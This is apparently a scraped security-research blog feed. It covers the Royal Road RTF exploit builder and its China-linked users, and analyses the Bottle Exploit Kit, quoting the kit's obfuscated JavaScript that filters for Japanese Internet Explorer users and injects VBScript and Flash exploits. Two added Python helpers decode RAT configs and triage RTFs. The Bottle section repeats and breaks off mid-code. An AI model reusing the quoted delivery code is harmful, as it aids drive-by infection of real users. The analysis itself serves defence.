/> [13] Check Point Research, “Vicious Panda: The COVID Campaign”, https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/<br /> [14] Bitdefender, “A Detailed Timeline of a Chinese APT Espionage Attack Targeting South Eastern Asian Government Institutions”, https://labs.bitdefender.com/2020/11/a-detailed-timeline-of-a-chinese-apt-espionage-attack-targeting-south-eastern-asian-government-institutions/<br /> [15] Proofpoint, “LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards”, https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks<br /> [16] Proofpoint, “LookBack Forges Ahead: Continued Targeting of the United States’ Utilities Sector Reveals Additional Adversary TTPs”, https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals<br /> [17] Proofpoint, “TA410: The Group Behind LookBack Attacks Against U.S. Utilities Sector Returns with New Malware”, https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new</p>
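<p>Returning to the XLBug RAT configuration described in the attack case against Japan above: the post states that the C&amp;C server string is encoded with Base64 and XOR, but gives neither the key nor the order of the two operations. The following Python helper is an added example written for this page; it is not nao_sec's code and not part of rr_decoder. It brute-forces every single-byte XOR key in both plausible orders and ranks the candidates that look like a host or IP:port. The sample blob, the key 0x5A and the XOR-then-Base64 order used to build it are constructed assumptions, and 203.0.113.10 is a documentation address, not an IOC.</p>

```python
"""Shortlist candidate C&C strings from a Base64+XOR-encoded RAT config blob."""
import base64
import binascii
import re
import string

# Constructed sample, not an IOC: the documentation address 203.0.113.10:443,
# XORed with the assumed single-byte key 0x5A and then Base64-encoded.
# The key and the "XOR first, Base64 second" order are assumptions for this
# example; recover_config() below relies on neither.
SAMPLE_KEY = 0x5A
SAMPLE_PLAINTEXT = b"203.0.113.10:443"
SAMPLE_BLOB = base64.b64encode(bytes(b ^ SAMPLE_KEY for b in SAMPLE_PLAINTEXT)).decode()

PRINTABLE = set(string.printable.encode())
HOSTLIKE_RE = re.compile(rb"^[A-Za-z0-9.\-]{3,253}(:\d{1,5})?$")
IPV4_PORT_RE = re.compile(rb"^(?:\d{1,3}\.){3}\d{1,3}:\d{1,5}$")


def xor_bytes(data, key):
    """XOR `data` with a repeating `key` (both bytes)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _b64(data):
    """Strict Base64 decode; None when `data` is not valid Base64."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def score(candidate):
    """3: IPv4:port, 2: something:port, 1: host-like, 0: not plausible."""
    if not all(c in PRINTABLE for c in candidate) or not HOSTLIKE_RE.match(candidate):
        return 0
    if IPV4_PORT_RE.match(candidate):
        return 3
    return 2 if b":" in candidate else 1


def recover_config(blob, key_space=range(256)):
    """Try every single-byte key in both plausible orders and return
    (score, order, key, plaintext) tuples, best candidate first.
      'b64_then_xor': plaintext = XOR(b64decode(blob), key)
      'xor_then_b64': plaintext = b64decode(XOR(blob, key))
    """
    raw_blob = blob.encode() if isinstance(blob, str) else bytes(blob)
    decoded_first = _b64(raw_blob)
    hits = []
    for key in key_space:
        k = bytes([key])
        if decoded_first is not None:
            cand = xor_bytes(decoded_first, k)
            if score(cand):
                hits.append((score(cand), "b64_then_xor", key, cand.decode()))
        cand = _b64(xor_bytes(raw_blob, k))
        if cand is not None and score(cand):
            hits.append((score(cand), "xor_then_b64", key, cand.decode()))
    # Best score first; ties broken by order name and key so output is stable.
    hits.sort(key=lambda h: (-h[0], h[1], h[2]))
    return hits


if __name__ == "__main__":
    for s, order, key, text in recover_config(SAMPLE_BLOB)[:5]:
        print(f"score={s} order={order} key=0x{key:02x} -> {text}")
```

<p>Single-byte brute force deliberately over-reports: several keys turn digits and dots into other letters that still pass the host-like filter, which is why the ranking prefers an IPv4:port shape and a real colon-separated port. On a real sample, run the same loop over each encoded string in the binary and look for the key that decodes all of them consistently.</p>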
  58. An Overhead View of the Royal Road

    Wed, 29 Jan 2020 15:00:00 -0000

    <h2 id="abstract">Abstract</h2> <p>Several targeted attack groups share the tools they use and are reported to carry out similar attacks. Attack tools are also shared in attacks targeting Japanese organizations; Tick, for example, may use a tool called the Royal Road RTF Weaponizer. Royal Road is also used by targeted attack groups suspected of links to China, such as Goblin Panda and Temp.Trident.</p> <p>In this blog, we focus on Royal Road and introduce the features of the tool: an outline of the tool, its behavior, and the exploited vulnerabilities. Next, we list the targeted attack groups that use Royal Road and show each attack case in detail. We have collected over 100 malicious documents since 2018 and investigated the malware they deploy and download. Even among groups using the same Royal Road tool, we attributed samples based on the targeted country/organization, the technique used in the attack, the malware executed, and so on.</p> <p>A wide variety of countries and organizations are targeted, mainly in Asia. Such information has been published by researchers all over the world, but it is not widely known that Royal Road is used in Tick attacks targeting Japanese organizations. Attacks using Royal Road are still active in 2019. We share the analysis results of malicious documents and malware based on the cases we observed. Other targeted attack groups may also be related to Royal Road; we introduce their attack cases and show how they relate.</p> <p>Finally, we show hunting techniques based on the characteristics of RTF files created with Royal Road and on the techniques preferred by the targeted attack groups that use them. This blog will help researchers analyzing targeted attacks, as well as CSIRT/SOC members, to understand these attacks and take countermeasures.</p> <h2 id="summary">Summary</h2> <h3 id="royal-road">Royal Road</h3> <p>Royal Road is an RTF weaponizer named by Anomali, sometimes called the “8.t RTF exploit builder”. The tool is not open source, but it is shared between multiple actors.</p> <p>We define an RTF generated by Royal Road as one that satisfies the following two conditions:</p> <ol> <li>It exploits a vulnerability in the Equation Editor</li> <li>It contains an object named 8.t</li> </ol> <p>Royal Road behaves as follows.</p> <ol> <li> <p>When the document is opened, the RTF drops a file (8.t) using the “Package” ActiveX control</p> </li> <li>All vulnerabilities used by the exploit code are in the Equation Editor. <ul> <li>CVE-2017-11882</li> <li>CVE-2018-0798</li> <li>CVE-2018-0802</li> </ul> </li> <li>The shellcode decodes 8.t and executes the malware, for example via DLL side-loading</li> </ol> <p><img src="https://nao-sec.org/assets/2020-01-30/behavior.png" alt="" /></p> <p>Versions v1-v5 were defined by Proofpoint and Anomali in their VB2019 presentation. We did further research on the RTF objects. Our RTF analysis showed a special byte sequence immediately before the shellcode, which we call the object pattern. The 8.t encoding is not tied to the version; we consider it an actor distinction rather than a tool distinction.</p> <p>For v3, no RTF containing 8.t could be found in our survey, so we define v3 as Royal Road-related rather than Royal Road.</p> <p>We define new versions, v6 and later. The object string changed slightly after v5 but is basically the same, while v7 has a very different object string. The v7 object pattern is the same as in v4-v6, but part of the object data is randomized.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/version.png" alt="" /></p> <h3 id="for-attribution">For attribution</h3> <ul> <li>Time <ul> <li>Submission to public services</li> <li>RTF creation time</li> </ul> </li> <li>Target country <ul> <li>Decoy file language</li> </ul> </li> <li>RTF characteristics <ul> <li>Object strings</li> <li>Object patterns</li> <li>Package patterns</li> <li>Object name and path</li> </ul> </li> <li>Payload encoding patterns</li> <li>Dropped file name</li> <li>Malware execution techniques <ul> <li>T1137 (Office Application Startup)</li> <li>T1073 (DLL Side-Loading)</li> </ul> </li> <li>Final payload (malware family)</li> </ul> <h3 id="actors">Actors</h3> <p>Here are the actors confirmed to use Royal Road. Chinese involvement is suspected for all of them.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/actor1.png" alt="" /> <img src="https://nao-sec.org/assets/2020-01-30/actor2.png" alt="" /></p> <p>These tables summarize each actor’s characteristics. We categorize the actors into three groups.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/actor_details.png" alt="" /></p> <h3 id="group">Group</h3> <ul> <li>Group-A: Conimes, Periscope and Rancor.</li> <li>Group-B: Trident, Tick, TA428 and Tonto.</li> <li>Group-C: everything else, which we cannot yet place.</li> </ul> <p><img src="https://nao-sec.org/assets/2020-01-30/group.png" alt="" /></p> <p>Group-A targets Southeast Asia. Periscope and Conimes were active at the same time and share the same techniques. Conimes and Rancor were also active at the same time and share some techniques. We believe these actors are close and may share tools and insights.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/groupA.png" alt="" /></p> <p>Group-B includes Trident, Tick, TA428 and Tonto. These actors target East Asia, especially Russia, Korea and Japan. Tick, TA428 and Tonto may use the same techniques; Tick and Tonto in particular are very similar. We believe the Group-B actors are very close and share techniques and insights.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/groupB.png" alt="" /></p> <h3 id="wrap-up">Wrap-up</h3> <p>RTF files created with Royal Road exploit vulnerabilities in the Equation Editor. These RTF files have various characteristics that help with attribution. Many actors use Royal Road; we can divide them into three groups and infer connections between actors.</p> <h3 id="appendix">Appendix</h3> <h4 id="appendix-1-ioc">Appendix-1: IOC</h4> <ul> <li><a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a></li> </ul> <h4 id="appendix-2-tool">Appendix-2: Tool</h4> <ul> <li><a href="https://github.com/nao-sec/rr_decoder">rr_decoder</a></li> <li><a href="https://github.com/nao-sec/yara_rules">Yara Rules</a></li> </ul> <hr /> <p>The full report is here: <a href="https://github.com/nao-sec/materials/raw/master/JSAC%2BCPRCon2020/An_Overhead_View_of_the_Royal_Road.pdf">[PDF (EN)]</a></p>
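<p>As an added example for the two Royal Road conditions listed in the Summary above (an Equation Editor exploit object and an object named 8.t), here is a small Python triage script. It is not nao_sec's code and not the rr_decoder tool: it pulls every \objdata hex stream out of an RTF, parses the OLE1 embedded-object header to recover the class name, and flags a Package object carrying the 8.t filename next to an Equation.3 object. The sample RTF is constructed inline with placeholder native data and contains no exploit; the helper names (build_ole1_embedded, parse_ole1_embedded, triage_rtf) belong to this example. Real samples may hide the class name or use a CLSID instead, so treat a hit as a reason to inspect the object pattern bytes the post describes, which the script reports for each object.</p>

```python
"""Triage an RTF for the two Royal Road conditions: an Equation Editor
object and an OLE "Package" object that drops a file named 8.t."""
import binascii
import re
import struct

OLE_VERSION = 0x00000501      # OLE1 ObjectHeader.OLEVersion (MS-OLEDS)
FORMAT_EMBEDDED = 0x00000002  # FormatID of an embedded object
EQUATION_CLASSES = (b"Equation.3", b"Equation.2")
EQUATION_CLSID = b"0002ce02-0000-0000-c000-000000000046"  # EQNEDT32 class id

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
OBJCLASS_RE = re.compile(rb"\\objclass\s+([^\s{}\\]+)")


def _lp_ansi(s):
    """LengthPrefixedAnsiString: 4-byte length (including NUL) + bytes + NUL."""
    return struct.pack("<I", len(s) + 1) + s + b"\x00"


def build_ole1_embedded(class_name, native_data):
    """Build an OLE1 embedded-object stream (only used to construct the sample)."""
    return (struct.pack("<II", OLE_VERSION, FORMAT_EMBEDDED)
            + _lp_ansi(class_name) + _lp_ansi(b"") + _lp_ansi(b"")
            + struct.pack("<I", len(native_data)) + native_data)


def parse_ole1_embedded(blob):
    """Parse an OLE1 embedded-object stream into (class_name, native_data)."""
    if len(blob) < 8:
        return None
    version, fmt = struct.unpack_from("<II", blob, 0)
    if version != OLE_VERSION or fmt != FORMAT_EMBEDDED:
        return None
    pos, names = 8, []
    for _ in range(3):  # ClassName, TopicName, ItemName
        if pos + 4 > len(blob):
            return None
        n = struct.unpack_from("<I", blob, pos)[0]
        pos += 4
        names.append(blob[pos:pos + n].rstrip(b"\x00"))
        pos += n
    if pos + 4 > len(blob):
        return None
    size = struct.unpack_from("<I", blob, pos)[0]
    return names[0], blob[pos + 4:pos + 4 + size]


def extract_objects(rtf):
    """Yield the decoded bytes of every \\objdata hex stream in the RTF."""
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]  # tolerate a stray trailing nibble
        yield binascii.unhexlify(hexdata)


def triage_rtf(rtf):
    """Return the Royal Road indicators found in `rtf` (bytes)."""
    classes = {c.lower() for c in OBJCLASS_RE.findall(rtf)}
    result = {"equation_object": False, "package_8t": False, "objects": []}
    if any(c.startswith(b"equation") for c in classes) or EQUATION_CLSID in rtf.lower():
        result["equation_object"] = True
    for blob in extract_objects(rtf):
        parsed = parse_ole1_embedded(blob)
        if parsed is None:
            result["objects"].append(("<unparsed>", blob[:16].hex()))
            continue
        cls, native = parsed
        # The leading native-data bytes are where an analyst would compare
        # the "object pattern" the post uses for versioning.
        result["objects"].append((cls.decode("latin-1"), native[:16].hex()))
        if cls in EQUATION_CLASSES:
            result["equation_object"] = True
        if cls == b"Package" and (b"8.t" in native or "8.t".encode("utf-16-le") in native):
            result["package_8t"] = True
    result["royal_road"] = result["equation_object"] and result["package_8t"]
    return result


# Constructed sample document, not a real Royal Road RTF: the Package object's
# native data carries the label and path "8.t" next to a placeholder payload,
# and the Equation.3 object holds placeholder bytes, not exploit data.
_PACKAGE_NATIVE = b"\x02\x00" + b"8.t\x00" + b"8.t\x00" + b"\x00\x00\x03\x00" + b"PLACEHOLDER"
_EQN_NATIVE = b"\x1c\x00\x00\x00\x02\x00" + b"\x00" * 10
SAMPLE_RTF = (
    b"{\\rtf1\\ansi"
    + b"{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata "
    + binascii.hexlify(build_ole1_embedded(b"Package", _PACKAGE_NATIVE)) + b"}}"
    + b"{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
    + binascii.hexlify(build_ole1_embedded(b"Equation.3", _EQN_NATIVE)) + b"}}"
    + b"}"
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_RTF
    print(triage_rtf(data))
```

<p>Run it as <code>python triage.py sample.rtf</code>; with no argument it triages the constructed sample. The script only reads the OLE1 wrapper, so it cannot tell whether the Equation object actually carries an exploit; the CVE-specific checks and the 8.t decoding remain the job of the YARA rules and rr_decoder linked in the appendix.</p>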
  59. Say hello to Bottle Exploit Kit targeting Japan

    Thu, 12 Dec 2019 15:00:00 -0000

    First

    On December 11, 2019, we were strolling through ad networks. As before, we observed the RIG, Fallout and Underminer exploit kits, but we also observed another interesting drive-by download attack. We call it “Bottle Exploit Kit”. BottleEK targets only Japanese users. According to our research, BottleEK has been active since at least September 2019. This time we introduce BottleEK. Sample traffic data is here.

    Traffic

    We have confirmed that victims are redirected to BottleEK by malvertising. When you are redirected from the ad network to BottleEK, the landing page HTML is loaded first. The landing page loads two JavaScript files.

        &lt;!doctype html&gt;
        &lt;html lang="ja"&gt;
        &lt;head&gt;
        &lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;
        &lt;meta http-equiv="x-ua-compatible" content="IE=10"&gt;
        &lt;meta http-equiv="Expires" content="0"&gt;
        &lt;meta http-equiv="Pragma" content="no-cache"&gt;
        &lt;meta http-equiv="Cache-control" content="no-cache"&gt;
        &lt;meta http-equiv="Cache" content="no-cache"&gt;
        &lt;link href="file/style.css" rel="stylesheet" type="text/css"/&gt;
        &lt;/head&gt;
        &lt;body style="background-color: #F4F4F4;font-family:MS PGothic,Arial,Hiragino Kaku Gothic ProN,Osaka,sans-serif"&gt;
        &lt;div id="main" class="main"&gt;&lt;/div&gt;
        &lt;script type="text/javascript" src="file/ajax.min.js"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="file/main.js"&gt;&lt;/script&gt;
        &lt;/body&gt;
        &lt;/html&gt;

    “ajax.min.js” is a JavaScript file for communication. It is used once, to get the exploit code URL. Since it is not important, we omit it this time. Just remember this function:

        function e() {
            var b = document.createElement("script"),
                c = (new Date).getTime() + Math.round(1e3 * Math.random()),
                d = "JSONP_" + c;
            a[d] = function (a) {
                clearTimeout(s), document.body.removeChild(b), q(a)
            }, b.src = h + (h.indexOf("?") &gt; -1 ? "&amp;" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b)
        }

    Next, let’s read “main.js”. This file contains obfuscation, debugger detection and environment detection. Reading everything is not easy…

    First, a large array is defined. It looks like Base64 strings, but base64_decode does not produce any meaningful data. To decrypt it, you need to read two processes.

        var _0x1d5a = ['bsK+BcOlwpXCmg==', 'OsKhwoIKb8OOwrHDsMOvEcOHw4Fn', 'ZMKfw6Fqw5R0', 'T1xqw70=', ...

    The first process rotates the array. The code looks like this:

        var _0x5906e4 = function (_0x35d916) {
            while (--_0x35d916) {
                _0x4480b8['push'](_0x4480b8['shift']());
            }
        };
        /* --- Snip --- */
        var _0x29fbca = {
            'getCookie': function (_0xa8b74, _0x1731ce) {
                _0xa8b74 = _0xa8b74 || function (_0x1e7379) {
                    return _0x1e7379;
                };
                var _0x36cf86 = _0xa8b74(new RegExp('(?:^|;\x20)' + _0x1731ce['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
                var _0x3ff1ff = function (_0xf3a699, _0x2d4894) {
                    _0xf3a699(++_0x2d4894);
                };
                _0x3ff1ff(_0x5906e4, _0x3c6c93);
                return _0x36cf86 ? decodeURIComponent(_0x36cf86[0x1]) : undefined;
            }
        }
        _0x29fbca['getCookie'](null, 'counter');

    Next, the rotated array entries are decoded. This is the decryption code: a combination of Base64, URL encoding and RC4.

        var decode = function (enc_data, key) {
            var a = [], b = 0, c, d = '', e = '';
            enc_data = atob(enc_data);
            for (var i = 0, length = enc_data['length']; i &lt; length; i++) {
                e += '%' + ('00' + enc_data['charCodeAt'](i)['toString'](16))['slice'](-2);
            }
            enc_data = decodeURIComponent(e);
            for (var i = 0; i &lt; 256; i++) {
                a[i] = i;
            }
            /* RC4 */
            for (i = 0; i &lt; 256; i++) {
                b = (b + a[i] + key['charCodeAt'](i % key['length'])) % 256;
                c = a[i];
                a[i] = a[b];
                a[b] = c;
            }
            i = 0;
            b = 0;
            for (var j = 0; j &lt; enc_data['length']; j++) {
                i = (i + 1) % 256;
                b = (b + a[i]) % 256;
                c = a[i];
                a[i] = a[b];
                a[b] = c;
                d += String['fromCharCode'](enc_data['charCodeAt'](j) ^ a[(a[i] + a[b]) % 256]);
            }
            return d;
        };

    With the array decrypted, the main process runs. First, it checks whether username is set in the cookie. If it is set, processing ends. If not, it sets the cookie username=bingv and the attack continues.

        var user = getCookie('username');
        if (user == '') {
            setCookie('username', 'bingv', 0x1);

    Next, it checks the user environment. This is one of the most characteristic parts of the Bottle Exploit Kit.

        var chk = checkEnv();

    checkEnv reads the browser language setting. If it is not Japanese, it displays a dummy HTML page and ends.

        function checkEnv() {
            var _0x4db42a = (navigator['language'] || navigator['browserLanguage'])['toLowerCase']();
            if (_0x4db42a['indexOf']('ja') == -0x1) return 0x0;
            document['getElementById']('main')['innerHTML'] = "&lt;h1&gt;Customer Login&lt;/h1&gt;&lt;form&gt;&lt;input type='text'value='User'&gt;&lt;input type='password'&gt;&lt;input type='submit'value='Submit'&gt;&lt;/form&gt;";

    Browser information is then taken from the User-Agent. If it is not Internet Explorer, the same dummy HTML is displayed and processing ends.

        var _0x100f15 = navigator['userAgent'];
        var _0xed2c96 = _0x100f15['indexOf']('compatible') &gt; -0x1 &amp;&amp; _0x100f15['indexOf']('MSIE') &gt; -0x1;
        var _0x4d34a9 = _0x100f15['indexOf']('Trident') &gt; -0x1 &amp;&amp; _0x100f15['indexOf']('rv:11.0') &gt; -0x1;
        if (_0xed2c96) {
            if (_0x2956('0x43', '^eQ7') !== _0x2956('0x44', '4@%$')) {
                var _0x41dde8 = new RegExp("MSIE (\d+\.\d+);");
                _0x41dde8['test'](_0x100f15);
                var _0x50d3cb = parseFloat(RegExp['$1']);
                return _0x50d3cb;
            } else {
                _0x53ccba(this, function () {
                    var _0x2e6966 = new RegExp("function *\( *\)");
                    var _0xdc7ac8 = new RegExp("\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))", 'i');
                    var _0x4fc827 = _0x118083('init');
                    if (!_0x2e6966['test'](_0x4fc827 + 'chain') || !_0xdc7ac8['test'](_0x4fc827 + 'input')) {
                        _0x4fc827('0');
                    } else {
                        _0x118083();
                    }
                })();
            }

    If these checks pass, an image is displayed. The 1.gif used here is a picture of a bottle. The str1 shown below the image is Japanese (“Loading . . . please wait”).

        var str1 = '読み込み中。 。 。 お待ちください&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;';
        /* --- Snip --- */
        if (chk &gt; 0x0) {
            var myimg = document['createElement']('img');
            myimg['setAttribute']('id', 'ldimg');
            myimg['setAttribute']('style', 'position:absolute;width:40%;left:30%;height:40%; top:20%; z-index: 10;display:inline');
            myimg['setAttribute']('src', 'file/1.gif');
            document['body']['appendChild'](myimg);
            var myp = document['createElement']('p');
            myp['setAttribute']('id', 'ldpr');
            myp['setAttribute']('style', 'font-size:30px; position:absolute; left:5%; text-align:center; height:10%; top:60%; width:90%; z-index:10;');
            document['body']['appendChild'](myp);
            for (var i = 0x0; i &lt;= LOAD_SECOND; i++) {
                var progress = Math['round'](i * 0x64 / LOAD_SECOND);
                (function (_0x368e63) {
                    setTimeout(function () {
                        change_progress(_0x368e63, str1);
                    }, i * 0x3e8);
                }(progress));
            }

    It then fetches the exploit code. Three parameters are sent with that request:

        Internet Explorer version
        whether the platform is 64-bit
        Adobe Flash Player version

        var is64 = 0x0;
        if (navigator['platform']['indexOf']('64') != -0x1) is64 = 0x1;
        var fls = flashChecker();
        ajax({
            'type': 'GET',
            'dataType': 'jsonp',
            'timeOut': 0x2710,
            'url': '/conn.php?callback=?',
            'data': {
                'data1': chk,
                'data2': is64,
                'data3': fls['v']
            },

    This request goes through the ajax.min.js function shown earlier, which is why a callback parameter is appended to the URL.

        function e() {
            var b = document.createElement("script"),
                c = (new Date).getTime() + Math.round(1e3 * Math.random()),
                d = "JSONP_" + c;
            a[d] = function (a) {
                clearTimeout(s), document.body.removeChild(b), q(a)
            }, b.src = h + (h.indexOf("?") &gt; -1 ? "&amp;" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b)
        }

    If the request succeeds, the exploit code is loaded from the response data. To exploit Internet Explorer, file/vbs.vbs is loaded; to exploit Adobe Flash Player, file/swf.swf is loaded.

        'success': function (_0x2ad29a) {
            if (_0x2ad29a[0x1] != '') {
                if (_0x2956('0x69', '904!') !== _0x2956('0x6a', 'mNBB')) {
                    var _0x5517a0 = document['createElement']('embed');
                    _0x5517a0['src'] = _0x2ad29a[0x1];
                    _0x5517a0['setAttribute']('style', 'width:1px; height:1px');
                    document['body']['appendChild'](_0x5517a0);
                } else {
                    var _0x33b1ee = cname + '=';
                    var _0x3a1f81 = document['cookie']['split'](';');
                    for (var _0x2e7aac = 0x0; _0x2e7aac &lt; _0x3a1f81['length']; _0x2e7aac++) {
                        var _0x446c09 = _0x3a1f81[_0x2e7aac];
                        while (_0x446c09['charAt'](0x0) == ' ') _0x446c09 = _0x446c09['substring'](0x1);
                        if (_0x446c09['indexOf'](_0x33b1ee) != -0x1) return _0x446c09['substring'](_0x33b1ee['length'], _0x446c09['length']);
                    }
                    return '';
                }
            } else if (_0x2ad29a[0x0] != '') {
                var _0x5a39f4 = document['createElement']('script');
                _0x5a39f4['type'] = 'text/vbscript';
                _0x5a39f4['src'] = _0x2ad29a[0x0];
                document['body']['appendChild'](_0x5a39f4);
            }
        }

    vbs.vbs exploits CVE-2018-8174 and swf.swf exploits CVE-2018-15982.

    <h2 id="first">First</h2> <p>On December 11, 2019, we were strolling through ad-networks. As before, we observed RIG, Fallout and Underminer Exploit Kit, but we also observed another interesting Drive-by Download attack. We call it “Bottle Exploit Kit”. BottleEK targets only Japanese users. According to our research, BottleEK has been active since at least September 2019. This time we introduce BottleEK.</p> <p><img src="https://nao-sec.org/assets/2019-12-13/0.gif" alt="" /></p> <p>Sample traffic data is <a href="https://www.virustotal.com/gui/file/5195da2b95ec7b13876ccca113cf6816146788fddbe99f16e3cb6af34f6c0822/detection">here</a>.</p> <h2 id="traffic">Traffic</h2> <p><img src="https://nao-sec.org/assets/2019-12-13/1.png" alt="" /></p> <p>We have confirmed that victims are redirected to BottleEK by malvertising. When the browser is redirected from the ad-network to BottleEK, the landing page HTML is loaded first. The landing page loads two JavaScript files.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;!doctype html&gt;
&lt;html lang="ja"&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;
&lt;meta http-equiv="x-ua-compatible" content="IE=10"&gt;
&lt;meta http-equiv="Expires" content="0"&gt;
&lt;meta http-equiv="Pragma" content="no-cache"&gt;
&lt;meta http-equiv="Cache-control" content="no-cache"&gt;
&lt;meta http-equiv="Cache" content="no-cache"&gt;
&lt;link href="file/style.css" rel="stylesheet" type="text/css"/&gt;
&lt;/head&gt;
&lt;body style="background-color: #F4F4F4;font-family:MS PGothic,Arial,Hiragino Kaku Gothic ProN,Osaka,sans-serif"&gt;
&lt;div id="main" class="main"&gt;&lt;/div&gt;
&lt;script type="text/javascript" src="file/ajax.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="file/main.js"&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre></div></div> <p>Note the <code class="language-plaintext highlighter-rouge">x-ua-compatible</code> meta tag: it forces the page into IE10 document mode, in which VBScript is still enabled (Microsoft disabled VBScript by default only in IE11 document mode, in its mid-2019 updates), so the VBScript exploit delivered later can still run.</p> <p>“ajax.min.js” is a JavaScript file for communication. 
It is used once, to fetch the exploit code URL. It is not important in itself, so we omit the rest of it; only this JSONP helper matters:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function e() {
    var b = document.createElement("script"),
        c = (new Date).getTime() + Math.round(1e3 * Math.random()),
        d = "JSONP_" + c;
    a[d] = function (a) {
        clearTimeout(s), document.body.removeChild(b), q(a)
    }, b.src = h + (h.indexOf("?") &gt; -1 ? "&amp;" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b)
}
</code></pre></div></div> <p>Next, let’s read “main.js”. This file contains obfuscation, debugger detection and environment detection, so reading everything is not easy… First, a large array is defined. This looks like an array of Base64 strings, but Base64-decoding the entries does not yield anything meaningful. To decrypt them you need to understand two routines.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x1d5a = ['bsK+BcOlwpXCmg==', 'OsKhwoIKb8OOwrHDsMOvEcOHw4Fn', 'ZMKfw6Fqw5R0', 'T1xqw70=', ...
</code></pre></div></div> <p>The first routine rotates the array: each iteration moves the first element to the end, so the entries end up at the indexes the rest of the code expects. It is called through the <code class="language-plaintext highlighter-rouge">getCookie</code> helper below, which increments the count before calling it. The code looks like this:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x5906e4 = function (_0x35d916) {
    while (--_0x35d916) {
        _0x4480b8['push'](_0x4480b8['shift']());
    }
};
/* --- Snip --- */
var _0x29fbca = {
    'getCookie': function (_0xa8b74, _0x1731ce) {
        _0xa8b74 = _0xa8b74 || function (_0x1e7379) {
            return _0x1e7379;
        };
        var _0x36cf86 = _0xa8b74(new RegExp('(?:^|;\x20)' + _0x1731ce['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)'));
        var _0x3ff1ff = function (_0xf3a699, _0x2d4894) {
            _0xf3a699(++_0x2d4894);
        };
        _0x3ff1ff(_0x5906e4, _0x3c6c93);
        return _0x36cf86 ? 
decodeURIComponent(_0x36cf86[0x1]) : undefined;
    }
};
_0x29fbca['getCookie'](null, 'counter');
</code></pre></div></div> <p>Next, each entry of the rotated array is decoded. This is the decryption routine: a combination of Base64 decoding, percent-decoding (each byte is turned into <code class="language-plaintext highlighter-rouge">%xx</code> and passed through <code class="language-plaintext highlighter-rouge">decodeURIComponent</code>, which UTF-8 decodes the byte string) and RC4, with the second argument as the RC4 key.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var decode = function (enc_data, key) {
    var a = [], b = 0, c, d = '', e = '';
    enc_data = atob(enc_data);
    for (var i = 0, length = enc_data['length']; i &lt; length; i++) {
        e += '%' + ('00' + enc_data['charCodeAt'](i)['toString'](16))['slice'](-2);
    }
    enc_data = decodeURIComponent(e);
    for (var i = 0; i &lt; 256; i++) {
        a[i] = i;
    }
    /* RC4 */
    for (i = 0; i &lt; 256; i++) {
        b = (b + a[i] + key['charCodeAt'](i % key['length'])) % 256;
        c = a[i];
        a[i] = a[b];
        a[b] = c;
    }
    i = 0;
    b = 0;
    for (var j = 0; j &lt; enc_data['length']; j++) {
        i = (i + 1) % 256;
        b = (b + a[i]) % 256;
        c = a[i];
        a[i] = a[b];
        a[b] = c;
        d += String['fromCharCode'](enc_data['charCodeAt'](j) ^ a[(a[i] + a[b]) % 256]);
    }
    return d;
};
</code></pre></div></div> <p>With the array decrypted, the main process runs.</p> <p>First, it checks whether a <code class="language-plaintext highlighter-rouge">username</code> cookie is set. If it is, processing ends, so a browser that has already been served is not attacked again. If not, it sets the cookie <code class="language-plaintext highlighter-rouge">username=bingv</code> and the attack continues.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var user = getCookie('username');
if (user == '') {
    setCookie('username', 'bingv', 0x1);
</code></pre></div></div> <p>Next, the user environment is checked. 
This is one of the most characteristic parts of the Bottle Exploit Kit.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var chk = checkEnv();
</code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">checkEnv</code> reads the browser language setting. If it is not Japanese, a dummy login form is displayed and the script ends.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function checkEnv() {
    var _0x4db42a = (navigator['language'] || navigator['browserLanguage'])['toLowerCase']();
    if (_0x4db42a['indexOf']('ja') == -0x1) return 0x0;
